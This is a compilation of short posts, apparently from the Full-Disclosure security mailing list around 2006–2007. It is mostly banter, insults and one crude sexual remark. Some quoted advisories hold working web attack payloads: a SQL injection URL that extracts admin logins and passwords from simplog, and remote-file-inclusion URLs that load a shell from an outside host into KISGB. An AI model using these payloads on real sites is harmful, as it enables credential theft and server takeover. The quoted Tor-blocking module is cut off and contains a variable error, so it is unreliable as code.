Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

[str0ke]

Ant-Sec Movement wrote:
> Once we have dealt with Hackforums.net, we will terminate Milw0rm.
> Better you had quit and left it at that, Str0ke, for now milw0rm.com
> <http://milw0rm.com> will be completely and utterly wiped. It is the
> second highest target after Hackforums.net. 
>

I would like to opt out on the milw0rm termination / wipage.  Secondly
when hackforums.net comes back online and are owned by anti-sec, can I
be moved to the bottom of the list if opting out isn't possible?  If
there are only 2 targets on the list, can you insert 5 to 6 targets in
between hackforums and milw0rm bumping it down a few notches.  If
hackforums.net doesn't ever come back online, do I get stuck in limbo
waiting until they get wiped free card?  If so hackforums.net please
stay offline, thanks.

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [FDSA] Notepad Highly Critical Cross-Site Scripting (XSS) Vulnerability

[str0ke]

Fredrick Diggle wrote:
> ###
>
> ===
> 3) Proof of Concept
> ===
>
> 1. Open Notepad
> 2. Enter the following text
> alert("xss");
> 3. Save file as "exploit.html"
> 4. double click the payload file
>
> ###
>   
lmfao.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] new default password database available

[str0ke]

On 8/18/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> Hi to everyone,
> there is a new default password database available.

You should change your domain to ilovetoripotherpeopleswork.com.

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies

[str0ke]

Thanks for the info MW,

If you have anymore info on this new and highly technical BITCh let me know.

/str0ke

On 5/20/07, Morning Wood <[EMAIL PROTECTED]> wrote:
> >> A crack commando lead by Gandhi (who showed up in
> >> boxing gloves and elastic pants) managed to destroy an Iranian
> >> building complex used to conduct Denial of Service attacks against
> >> str0ke's private IRC intelligence service.
> >
> > But how did he destroy the building is the real question?
> >
> > /str0ke
>
>  Gandhi has been known to be secretly developing a "bot intra transformation
> chromatifier", or
> BITCh, for short. This appears to actualy harness the power of teh bots DoS
> functions, via a
> fiber optic link to power a "wave disruptor", being co developed by MI6.
> Digging further,
> reports are that an engineer by the aformentioned code name "v3dt3n" has
> been a major
> player in this.  This is all the info I can find for now...
>
> hope it helps,
> M.Wood
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies

[str0ke]

> A crack commando lead by Gandhi (who showed up in
> boxing gloves and elastic pants) managed to destroy an Iranian
> building complex used to conduct Denial of Service attacks against
> str0ke's private IRC intelligence service.

But how did he destroy the building is the real question?

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows POC

[str0ke]

On 5/16/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>
>
>  >> http://www.milw0 ..  for example
>
> A word of advice to everyone: Don't send milw0rm links out to the list
> unless you want to drown in blowback from Antigen gateways.

Wow that sucks :)

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Sexy, spankable 22 year old girl looking for a wild time

[str0ke]

On 3/21/07, evilrabbi <[EMAIL PROTECTED]> wrote:
> If you look at the pictures on livejournal you can see a tampon string
> hanging out of her vag... O_o
> It's the 3rd picture down.

By GOD there is a tampon string hanging out of her vag WTF

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection

[str0ke]

Thank you for the info, code has been updated.

/str0ke

On 3/1/07, don bailey <[EMAIL PROTECTED]> wrote:
>
> > http://www.milw0rm.com/exploits/3390
> >
> > Plagiarism sucks.
>
> So does altering source code before you post it on your website.
>
> http://kernelspace.us/itheft.c
> http://www.milw0rm.com/exploits/3383
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [EMAIL PROTECTED] likes spam (but does spam like [EMAIL PROTECTED])

[str0ke]

> n3td3v was doing the same thing, "I'm just lazier than her" << n3td3v is 
> female?

Now it all makes sense.

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] simplog 0.9.3.2 SQL injection

[str0ke]

Javor,

It seems rgod found this vulnerability back in April of 2006.

http://www.milw0rm.com/exploits/1663

<>
  ii)
  http://[target]/[path]/index.php?blogid=[sql]
  http://[target]/[path]/archive.php?blogid=[sql]
  http://[target]/[path]/archive.php?m=[sql]
  http://[target]/[path]/archive.php?y=[sql]

/str0ke

On 1/1/07, Javor Ninov <[EMAIL PROTECTED]> wrote:
> Afected Software:
> simplog up to 0.9.3.2 (latest version - 12/05/2006 )
>
> Site:
> http://www.simplog.org
> Simplog provides an easy way for users to add blogging capabilities to
> their existing websites. Simplog is written in PHP and compatible with
> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
> Powerful, yet simple
>
> Vulnerability:
> SQL Injection in archive.php
> other files probably also affected
>
> Example:
> http://example.com/simplog/archive.php?blogid=1&pid=%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>
> Vendor status:
> NOT NOTIFIED
>
>
> Javor Ninov aka DrFrancky
> drfrancky shift+2 securax.org
> http://securitydot.net/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB

[str0ke]

Dear 0o_zeus_o0 elitemexico.org,

 Thanks, this won't be going up since this was posted on milw0rm today
around 4-6 hours ago for the original author mdx.

http://www.milw0rm.com/exploits/2979.

The only affected script is authenticate.php with the
default_path_for_themes variable.  The rest of them just
include/require the vulnerable script.

/str0ke

On 12/22/06, 0o_zeus_o0 elitemexico.org <[EMAIL PROTECTED]> wrote:
> ###
> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
> #
> # Author: 0o_zeus_o0 ( Arturo Z. )
> # Contact: [EMAIL PROTECTED]
> # Website: www.diosdelared.com
> # Date: 22/12/06
> # Risk: critical
> # Vendor Url: http://sourceforge.net/projects/kisgb ,
> http://ravenphpscripts.com
> # Affected Software: Keep It Simple Guest Book
> # search: inurl:kisgb , intitle:KISGB
> #
> #Info:
> ##
> #Bug is risky by since it is possible to be included I cosay malisioso
> #that allows to see or to modify the archives
> #code:
> #if (isset($default_path_for_themes))
> require("$default_path_for_themes/$theme");
> #else require("$path_to_themes/$theme");
> ##
> #
> #
> #http://site/path/gbpath/authenticate.php?path_to_themes=
> http://shellsite.com/php.gif?
> #
> #http://site/path/gbpath/admin.php?default_path_for_themes=http://shellsite.com/php.gif?
> #
> #http://site/path/gbpath/upconfig.php?default_path_for_themes=
> http://shellsite.com/php.gif?
> ##
> #VULNERABLE VERSIONS
> ##
> # 5.0.0
> #
> ##
> #Contact information
> #0o_zeus_o0
> [EMAIL PROTECTED]
> #www.diosdelared.com
> ##
> #greetz: S.S.M, sams, a mi beba
> #Original Advisory: http://diosdelared.com/15.txt
> ##

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] non-tech: defcon and FD. :)

[str0ke]

On 8/25/06, Adriel Desautels <[EMAIL PROTECTED]> wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Gadi, you are scary?


To sum up your question, Gadi makes "big bird" look like a midget.

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit

[str0ke]

Jose,

It works just fine.  Tested on 7 test-bed hosts without an issue.

/str0ke

On 7/10/06, José Parrella <[EMAIL PROTECTED]> wrote:

On 7/9/06, Alexander Hristov <[EMAIL PROTECTED]> wrote:
> Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit
> Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html
> Date :  2006-06-30
> Patch : update to version 1.290
> Advisory : 
http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html

Has anyone tested this? I've just tested this in Webmin 1.180 (Debian
3.1, package revision number 3) and didn't work (I had to explicitly
allow the attacker IP to the miniserv.conf, which is not the default
configuration in Debian and, I think, in Webmin's original tar.gz)

Jose



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] so...

[str0ke]

Who is coming to my lecture? ;)


Ill be there.  I don't think people have the balls to throw tomatoes
while a presentation is going on, but hey I could be wrong.

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ***ULTRALAME*** Microsoft Excel Unicode Overflow ***ULTRALAME***

[str0ke]

Must be the advisory. (:

/str0ke

On 6/21/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:

me I wonder who's ultralame, kcope or the advisory ? :>


kcope wrote:
> Hello FistFuXXer,
> Very nice that you found that, since unicode overflows are not that
> easy to exploit.
> I didn't know that Spreadsheet-Perl converted the string into unicode
> and then put it
> into the file.
> Very nice very nice :o) I like that 0x41414141 :o) weird I didn't even
> look into the
> hex edit of the xls file.
>
> Best Regards,
>
> kcope
>
>
>
> FistFuXXer wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Hello kcope,
>>
>> the vulnerability that you've found isn't an Unicode-based buffer
>> overflow, Spreadsheet-Perl just converts the string to Unicode and you
>> can edit it later with a hex editor.
>>
>> It's just a simple stack overflow that overwrites the memory after the
>> return address. Until all the write-able stack memory is full and the
>> application tries to overwrite the read-only memory after it, an
>> exception happens. So you won't be able to exploit it by using the
>> return address of the vulnerable 'hlink' function but you can still use
>> the SE handler for exploitation.
>>
>> It looks like Microsoft should release security patches ASAP.
>>
>>
>> Sincerely yours,
>> Manuel Santamarina Suarez
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> __ NOD32 1.1611 (20060620) Information __
>
> This message was checked by NOD32 antivirus system.
> http://www.eset.com
>
>
>



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Tool Release - Tor Blocker

[str0ke]

Umm what about the new ip addresses that are added to the tor network?

http://serifos.eecs.harvard.edu/cgi-bin/exit.pl?sortbw=1&addr=1&textonly=1

This wouldn't really be a complete fix.

/str0ke

On 6/2/06, Jason Areff <[EMAIL PROTECTED]> wrote:

It has come to our attention that the majority of tor users are not actually
from china but are rather malicious hackers that (ab)use it to keep their
anonymity. We have released a tool to stop users from utilizing this tool to
protect their identity from prosecution by a designated systems
administrator. Otherwise this puts the administrator in responsibility for
any malicious actions caused by said user. Forensics is left with a tor exit
node.


 Recently our servers were hacked by a tor user and we were unable to
prosecute due to not being able to trace the source as the user was using
this malicious piece of software to keep his/her anonymity.


 To mitigate most tor attackers we've written an apache module designed to
give tor users a 403 error when visiting a specific website.  We suggest all
administrators whom do not wish a malicious tor user to visit and possibly
deface their website to enable the usage of this module. This may not get
all attackers, but hopefully it raises the security bar just a little bit
more to safeguard ourselves from hackers.

 Thanks.

 Jason Areff
 CISSP, A+, MCSE, Security+


 --
 security through obscurity isnt security
 --



CODE:





/* MOD_DETOR
*/
  //blocks tor users from apache 2 server

#include "http_config.h"
#include "httpd.h"
static void mod_detor_register_hooks(apr_pool_t *p);
int mod_detor_method_handler(request_rec *rec);

module AP_MODULE_DECLARE_DATA detor_module = {
STANDARD20_MODULE_STUFF,NULL, NULL, NULL, NULL, NULL,
mod_detor_register_hooks };

static void mod_detor_register_hooks(apr_pool_t *p) {
ap_hook_handler (mod_detor_method_handler, NULL, NULL, APR_HOOK_FIRST);}
int mod_detor_method_handler (request_rec * rec) {

conn_rec *connection = rec->connection;
const char *internetaddress = con->remote_ip;
char *listof33[] = {
"62.178.28.11", "83.65.91.110", "86.59.21.38", " 202.173.141.155",
"69.70.237.137", "209.172.34.176", "66.11.179.38", " 216.239.78.246",
"198.161.91.196", "72.0.207.216", " 139.142.184.213", "64.229.250.110",
"72.60.167.126", "24.36.132.185", " 70.68.168.93", "84.73.12.12",
"80.242.195.68", "84.72.104.77 ", "62.2.174.20", "211.94.188.225",
"166.111.249.39", " 218.58.83.2", "218.72.40.145", "219.142.175.208",
"222.28.80.131", " 147.251.52.140", "81.0.225.179", "213.220.233.15",
" 85.178.229.8", "84.58.246.2", "80.143.198.147", "80.190.241.118",
" 89.52.64.107", "85.214.38.21", "81.169.130.130", "83.171.170.169",
" 62.75.129.201", "217.160.177.118", "213.61.151.217", " 89.58.21.142",
"217.172.187.46", "81.169.136.161", "213.239.202.232", " 62.75.222.205",
"84.16.234.153", "212.12.60.181", "84.167.55.157 ", "62.75.171.154",
"85.25.132.119", "217.190.228.18", " 212.112.231.83", "213.133.99.185",
"85.176.201.130", "212.112.241.137", " 131.188.185.41", "84.175.229.31",
"217.187.160.148", " 87.123.81.89", "212.112.235.83", "213.39.133.132",
"85.176.92.87", " 212.114.250.252", "217.160.220.28", "213.239.211.148",
" 217.20.117.240", "80.190.250.139", "212.112.241.159", "217.224.170.117",
"212.112.242.21", "212.112.228.2", "217.160.108.109", " 81.169.176.178",
"212.99.205.46", "85.31.186.86", "85.10.240.250", " 84.141.183.62",
"84.56.199.101", "87.106.2.7", "217.160.142.69", " 84.163.168.232",
"213.239.217.146", "84.177.160.152", "62.75.151.195", " 81.169.176.135",
"85.214.29.61", "85.179.0.63", "85.31.187.90 ", "212.202.233.2",
"134.130.58.205", "81.169.132.19", " 212.88.142.147", "212.168.190.8",
"141.76.46.90", "80.237.203.179", " 193.28.225.8", "88.198.253.18",
"85.214.44.126", "217.160.95.117 ", "62.75.149.130", "84.44.156.17",
"81.169.180.180", " 85.14.216.20", "80.190.242.122", "212.112.242.159"

Re: [Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability

[str0ke]

win2k 6.0.2800.1106 (no crash)

On 5/26/06, yuanfan bai <[EMAIL PROTECTED]> wrote:

In my winxp and win2k3 all run steadily, not any exception..


2006/5/26, r k <[EMAIL PROTECTED]>:
>


Hi All,


IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page.

the following is the code






Internet Explorer Ver 6.0.2800.1106



  var wwidth = (window.innerWidth)?window.innerWidth: ((document.all
)?document.body.offsetWidth:null);

  while (wwidth)
  {
 self.resizeBy(-99, -1);
  }








tested on windows 2000,windows XP



thank you

antar






___
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability

[str0ke]

This isn't the whitehat lovers group, anything and everything goes for
Full Disclosure.

> "Just who does he think he is? [...] Zalewski may think
>  he's some sort of hero disclosing this information, but his is the act of a 
> vandal.

No a vandal wouldn't disclose the information, a vandal on the other
hand would sell the information / code to spyware companies.  Hmm,
think about it.

The funny part about this whole situation is that the people that
bashed on MZ never contributed a pea to what he has to this list.

/str0ke

On 4/27/06, Pedro Hugo <[EMAIL PROTECTED]> wrote:
> >   "Just who does he think he is? [...] Zalewski may think he's some sort
> of hero disclosing this information, but his is the act of a vandal.
> If
> >   it turns out that the bug is exploitable and abused before it's
> patched,
> >   then perhaps he'll be proud to be remembered for that."
>
> He is what he wants to be... Afaik, there are no laws about disclosure.
> Everyone does what he thinks it's best, even if it's best only for himself
> (like Adam Smith "said", everyone acts on their own interest).
> The bug requires user interaction. If most users are too stupid to click
> anything, the problem will not be solved with patching.
> And, even with patches, can you estimate what percentage of systems which
> are patched right away ? Yeah, most aren't!
>
> No sysadmin likes to be catched by surprise with security problems. But,
> life isn't always perfect !
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Proxy Detection

[str0ke]

On 4/23/06, Andrew A <[EMAIL PROTECTED]> wrote:
> Tor does not give an x-forward-for.

Easy fix to detect the Tor users is just to dump a cache file every
hour or so and regex the connecting ip address.

http://serifos.eecs.harvard.edu/cgi-bin/exit.pl?sortbw=1&addr=1&textonly=1

> use newer proxies
A simple `"ip" proxy` query to yahoo/google/alta/, based off of the
results would do the trick as well.  I use this technique and haven't
had any problems.

> x-forward-for
HTTP_X_FORWARDED_FOR
HTTP_VIA
HTTP_CLIENT_IP
HTTP_PROXY_CONNECTION
FORWARDED_FOR
X_FORWARDED_FOR
X_HTTP_FORWARDED_FOR
HTTP_FORWARDED

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

[str0ke]

On 3/25/06, KF (lists) <[EMAIL PROTECTED]> wrote:
> Andrew A wrote:
>
> >
> >  Hey BlueBoar, how has life been since we got you fired from
> > SecurityFocus?
> >
> >
> >
> How about yours since you stopped beating your wife?
>
> -KF

OMFG Ouch.

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Re: Re: Links to Google's cache of626FrSIRTexploits

[str0ke]

Is it possible we can get this wget'ing artwork incorporated with the
korn shell?

/str0ke

On 3/23/06, Dave Korn <[EMAIL PROTECTED]> wrote:
> nocfed wrote:
> > Really, do you ``hackers'' really not know howto at least read the
> > manpage for wget?
> >
> > There is no need for any script, only a few switches to wget.
> >
> > Hint: -e robots=off
>
>   Wow!  j00 R so 1337!  Hint:  -e clue=on
>
>   Seriously, I truly phj33r your 4w3s0Me!!!one!1 man-page reading skills,
> but how could you imagine that switch could possibly make the slightest
> difference?  robots.txt is enforced (or ignored) by the client.  If a server
> returns a 403 or doesn't, depending on what UserAgent you specified, then
> how could making the client ignore robots.txt somehow magically make the
> server not return a 403 when you try to fetch a page?
>
>   If you think that a switch that makes no difference to the data going over
> the wire could affect the response given to an otherwise identical protocol
> request sent back by the server, you must think they're using IP over ESP as
> a transport layer.  Which rfc was that again?
>
>   Or perhaps you just don't understand the first thing about the
> client-server model of system architecture.  In which case you're in no
> position to go around calling other people hackers in sarcastic quote
> marks[*].
>
>   Anyway, this is a great illustration of the dangers of posting smartarse
> replies without actually having TRIED what you claim will work.  Let me
> *prove* it: here's what happens if you try and wget the list of cached page,
> first with no switches, then with -e but no -U, then with -U but no -e.
>
> --- options>---
>
> [EMAIL PROTECTED] /artimi/haxx0r/frsirt/test> wget -i list.txt
> --14:53:56--
> http://72.14.203.104/search?q=cache:HG1c4HzNGuYJ:www.frsirt.com/exploits/20050621.p33r-b33r.c.php+site:frsirt.com+p33r&hl=en&ct=clnk&cd=2
>=>
> [EMAIL PROTECTED]&hl=en&ct=clnk&cd=2'
> Connecting to 72.14.203.104:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 14:53:57 ERROR 403: Forbidden.
>
> --14:53:57--
> http://72.14.203.104/search?q=cache:mI8fMz47MSQJ:www.frsirt.com/exploits/20060226.sco-root-exploit.c.php+site:frsirt.com+prdelka&hl=en&ct=clnk&cd=1
>=>
> [EMAIL PROTECTED]&hl=en&ct=clnk&cd=1'
> Connecting to 72.14.203.104:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 14:53:59 ERROR 403: Forbidden.
>
> --14:53:59--
> http://72.14.203.104/search?q=cache:http://www.frsirt.com/exploits/20060307.revilloc.pl.php
>=>
> [EMAIL PROTECTED]'
> Connecting to 72.14.203.104:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 14:54:00 ERROR 403: Forbidden.
>
> --14:54:00--
> http://72.14.203.104/search?q=cache:http://www.frsirt.com/exploits/20060305.ms-visual-dbp.c.php
>=>
> [EMAIL PROTECTED]'
> Connecting to 72.14.203.104:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 14:54:01 ERROR 403: Forbidden.
> ^C
> ---<-e>---
>
> [EMAIL PROTECTED] /artimi/haxx0r/frsirt/test> wget -i list.txt -e robots=off
> --14:54:12--
> http://72.14.203.104/search?q=cache:HG1c4HzNGuYJ:www.frsirt.com/exploits/20050621.p33r-b33r.c.php+site:frsirt.com+p33r&hl=en&ct=clnk&cd=2
>=>
> [EMAIL PROTECTED]&hl=en&ct=clnk&cd=2'
> Connecting to 72.14.203.104:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 14:54:13 ERROR 403: Forbidden.
>
> --14:54:13--
> http://72.14.203.104/search?q=cache:mI8fMz47MSQJ:www.frsirt.com/exploits/20060226.sco-root-exploit.c.php+site:frsirt.com+prdelka&hl=en&ct=clnk&cd=1
>=>
> [EMAIL PROTECTED]&hl=en&ct=clnk&cd=1'
> Connecting to 72.14.203.104:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 14:54:15 ERROR 403: Forbidden.
>
> --14:54:15--
> http://72.14.203.104/search?q=cache:http://www.frsirt.com/exploits/20060307.revilloc.pl.php
>=>
> [EMAIL PROTECTED]'
> Connecting to 72.14.203.104:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 14:54:16 ERROR 403: Forbidden.
>
> --14:54:16--
> http://72.14.203.104/search?q=cache:http://www.frsirt.com/exploits/20060305.ms-visual-dbp.c.php
>=>
> [EMAIL PROTECTED]'
> Connecting to 72.14.203.104:80... connected.
> HTTP req

Re: [Full-disclosure] Links to Google's cache of 626 FrSIRT exploits

[str0ke]

Everything listed on frsirt under the exploit section is listed on
milw0rm.com for a second reference.

/str0ke

On 3/19/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> So you never recursively sucked FrSIRT.com before the public exploits section 
> was "definitively closed" well we're in luck (at least for a little while) 
> because Google did.
>
> This page links to Google's cache of 626 FrSIRT exploits
>
> http://www.elsenot.com/frsirt-google.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ADVISORY # -Thu Mar 16 14:09:58 EST 2006- # Integer Overflow in Ethereal

[str0ke]

ADVISORY # -Thu Mar 16 14:09:58 EST 2006- # Integer Overflow in Ethereal




=
8===D BACKGROUND
=
This problem has no background commentary on this vulnerability in question.
=
8===D DESCRIPTION
=
Ethereal incorrectly parses integer data, and this can be used to execute 
arbitrary code.

=
8===D HISTORY
=
2/1/2006 8==D Vendor Notification.
28/2/2006 8==D Vendor Reply.
16/3/2006 8==D Public Disclosure.
=
8===D WORKAROUND
=
This problem has no workarounds on the problem.
=
8===D VENDOR RESPONSE
=
Ethereal has offered no identified information about this problem at hand.


=
CONTACT
=
str0ke [EMAIL PROTECTED]
1-888-565-9428

CCE GREM SSP-CNSA GIPS CAP SSCP 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

[str0ke]

Class,

I just made 50k reporting you ;)

/str0ke

On 2/15/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> nop totally wrong, I got 50k yesterday reporting my sister ..
>
> ;D
> Stan Bubrouski wrote:
> > On 2/15/06, Jerome Athias <[EMAIL PROTECTED]> wrote:
> >> $50,000 for reporting BSA that your neighbor uses an illegal version of
> >> Window$ !
> >
> > That is entirely inaccurate.  The $5 reward with numerous strings
> > attached is for reporting a company using multiple pirated copies of
> > software, reporting your neighbor+ apparently yeilds no reward other
> > than flaming crap on your doorstep and RAT written on your windows :-P
> >
> > -sb
> >
> >> https://reporting.bsa.org/usa/home.aspx
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
>
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.2 (MingW32)
>
> iQIVAwUBQ/OeLq+LRXunxpxfAQKTkxAA6rEaNbwSfOHMLVEUX8nWeci6haHkxxrG
> jLaQAqEEXeWiQr/qHi0hXg78bLGfOya0TnB7xj11iy9LNfwZzj7nOtLjBqM00+zW
> yGII5mePqteKhpHimTln3y4bP5mYn5vb4ETlqWhrZ4tyia9QqDbMlj+h+qXGAPlT
> gRQp2B4hAETFzsJLt9V/n2l52yGrYW6ZVWZLBjX1U+xtBQII7Xt2z1nulYT5xO2g
> B8aM6fRfD/h9rQspaxwmnGscEOnqiqSm5N5rudXzg68W92UyDrOJ4sQh4FMV4TdT
> 1hHVBpRrnN5eCtiZ7paaBhiFLwb6w6Cf59Sn8K7iyDZjpUueRFEV41pLtcjQbccj
> 4xRIXTt6+fCHmi6R2BT01qDJ6eCTQ/fd0WGlMCw0NXoUZqoJGUG5yyZ+wHVcqldC
> q5P4UnCaE2b0G9b1wiY3bUlntwyopwzjqmUbsqS57JhntI6Vq+YHzPx7kszzwQYf
> NEe5cPDCTfyqPIH53PziZpSS67twQX7mekC9tiDfmzfAaeiLUyLjFonm4sT58d9e
> gY1bX7bdnL+jCdWyrOjFajEccPTOYkc+WighGDnfW75sdcFfcIWLCaxqFnXGZPdR
> i8R8A3d3ooHAD9/iqTFn7IIIneQIPS43QlaYhpn/m/xf6sjkLxLSKMb1hwc0+0d9
> xM4Xhsx3aAI=
> =ve/Z
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] private imap4d exploit

[str0ke]

My bad.

printf("[!] mailutils imapd4d universal(?) exploit 0.5 by crash-x /
unl0ck / scozar\n");

/str0ke



On 1/22/06, crash-x <[EMAIL PROTECTED]> wrote:
> On 1/22/06, str0ke <[EMAIL PROTECTED]> wrote:
> > Why change the information inside?  I thought this was unl0cked's code
> > not rosiello's.
>
> Because the guy thinks it is funny and would annoy me. The code is
> neither unl0ck's nor rosiello's.
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] private imap4d exploit

[str0ke]

Why change the information inside?  I thought this was unl0cked's code
not rosiello's.

/str0ke

On 1/22/06, crash-x gay <[EMAIL PROTECTED]> wrote:
>
>
>
>  
> Yahoo! Messenger NEW - crystal clear PC to PC calling worldwide with
> voicemail
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] happy new year.

[str0ke]

Wasn't this vuln posted in 95?

/str0ke
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PHC proudly presents ...

[str0ke]

